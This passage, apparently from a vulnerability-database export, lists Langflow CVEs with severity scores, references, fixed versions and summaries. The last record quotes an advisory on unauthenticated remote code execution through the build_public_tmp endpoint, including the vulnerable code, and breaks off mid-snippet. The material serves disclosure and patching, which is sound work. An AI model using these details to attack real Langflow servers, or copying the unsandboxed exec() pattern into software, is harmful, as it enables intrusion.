scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443
16
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87
17
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc
18
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33873
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33873
19
reference_url https://github.com/advisories/GHSA-v8hw-mh8c-jxfc
reference_id GHSA-v8hw-mh8c-jxfc
reference_type
scores
url https://github.com/advisories/GHSA-v8hw-mh8c-jxfc
fixed_packages
0
url pkg:pypi/langflow@1.9.0
purl pkg:pypi/langflow@1.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0
aliases CVE-2026-33873, GHSA-v8hw-mh8c-jxfc, PYSEC-2026-82
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v5pc-pdm9-97g8
17
url VCID-wv26-29b9-vqgg
vulnerability_id VCID-wv26-29b9-vqgg
summary 
Langflow versions prior to 1.3.0 are susceptible to code injection in 
the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary
code.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-3248
reference_id
reference_type
scores
0
value 0.92665
scoring_system epss
scoring_elements 0.9976
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-3248
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0
3
reference_url https://github.com/langflow-ai/langflow/pull/6911
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://github.com/langflow-ai/langflow/pull/6911
4
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
5
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248
6
reference_url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
7
reference_url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
8
reference_url https://www.vulncheck.com/advisories/langflow-unauthenticated-rce
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://www.vulncheck.com/advisories/langflow-unauthenticated-rce
9
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt
reference_id CVE-2025-3248
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt
10
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py
reference_id CVE-2025-3248
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
reference_id CVE-2025-3248
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
12
reference_url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
reference_id GHSA-rvqx-wpfh-mfx7
reference_type
scores
url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
13
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
reference_id GHSA-rvqx-wpfh-mfx7
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
fixed_packages
0
url pkg:pypi/langflow@1.3.0
purl pkg:pypi/langflow@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-fc5h-qc2t-xqc3
7
vulnerability VCID-ncvf-vzqr-uydz
8
vulnerability VCID-q4r1-xjfk-7bg9
9
vulnerability VCID-qwtw-q92t-quhz
10
vulnerability VCID-rc54-gw71-gyau
11
vulnerability VCID-rrva-95s5-kbcf
12
vulnerability VCID-sbea-kkfu-akgb
13
vulnerability VCID-u8mw-7znw-rfab
14
vulnerability VCID-v5pc-pdm9-97g8
15
vulnerability VCID-ypxh-x2hy-3uhb
16
vulnerability VCID-ysnc-jyxb-6qcy
17
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0
aliases CVE-2025-3248, GHSA-rvqx-wpfh-mfx7, PYSEC-2025-36
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wv26-29b9-vqgg
18
url VCID-ypxh-x2hy-3uhb
vulnerability_id VCID-ypxh-x2hy-3uhb
summary 
Langflow: Cleartext Storage of Authentication Settings in Project Creation Endpoint
A security vulnerability has been detected in langflow-ai langflow up to 1.8.3. The affected element is the function create_project/encrypt_auth_settings of the file src/backend/base/Langflow/api/v1/projects.py of the component Project Creation Endpoint. Such manipulation of the argument auth_settings leads to cleartext storage in a file or on disk. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-6598
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02941
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-6598
1
reference_url https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-6598
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-6598
5
reference_url https://vuldb.com/submit/791921
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://vuldb.com/submit/791921
6
reference_url https://vuldb.com/vuln/358233
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://vuldb.com/vuln/358233
7
reference_url https://vuldb.com/vuln/358233/cti
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://vuldb.com/vuln/358233/cti
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
9
reference_url https://github.com/advisories/GHSA-9jpj-cph8-w449
reference_id GHSA-9jpj-cph8-w449
reference_type
scores
url https://github.com/advisories/GHSA-9jpj-cph8-w449
fixed_packages
0
url pkg:pypi/langflow@1.9.1
purl pkg:pypi/langflow@1.9.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.1
aliases CVE-2026-6598, GHSA-9jpj-cph8-w449
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ypxh-x2hy-3uhb
19
url VCID-ysnc-jyxb-6qcy
vulnerability_id VCID-ysnc-jyxb-6qcy
summary Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints — including built-in code-execution functionality — allowing the attacker to execute arbitrary code and achieve full system compromise.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-34291
reference_id
reference_type
scores
0
value 0.32746
scoring_system epss
scoring_elements 0.96973
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-34291
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Attend
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/pull/10139
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/10139
3
reference_url https://github.com/langflow-ai/langflow/pull/10696
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/10696
4
reference_url https://github.com/langflow-ai/langflow/pull/9240
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/9240
5
reference_url https://github.com/langflow-ai/langflow/pull/9441
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/9441
6
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml
7
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291
8
reference_url https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Attend
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/
url https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform
9
reference_url https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Attend
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/
url https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-34291
reference_id CVE-2025-34291
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-34291
11
reference_url https://www.crowdsec.net/vulntracking-report/cve-2025-34291
reference_id CVE-2025-34291
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.crowdsec.net/vulntracking-report/cve-2025-34291
12
reference_url https://github.com/advisories/GHSA-577h-p2hh-v4mv
reference_id GHSA-577h-p2hh-v4mv
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-577h-p2hh-v4mv
fixed_packages
0
url pkg:pypi/langflow@1.7.0
purl pkg:pypi/langflow@1.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0
aliases CVE-2025-34291, GHSA-577h-p2hh-v4mv, PYSEC-2025-78
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ysnc-jyxb-6qcy
20
url VCID-zqwj-45w7-7kft
vulnerability_id VCID-zqwj-45w7-7kft
summary 
Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint
## Summary

The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.

This is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.

## Affected Code

### Vulnerable Endpoint (No Authentication)

**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657

```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED
    request: Request,
    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...
):
    """Build a public flow without requiring authentication."""
    client_id = request.cookies.get("client_id")
    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)

    job_id = await start_flow_build(
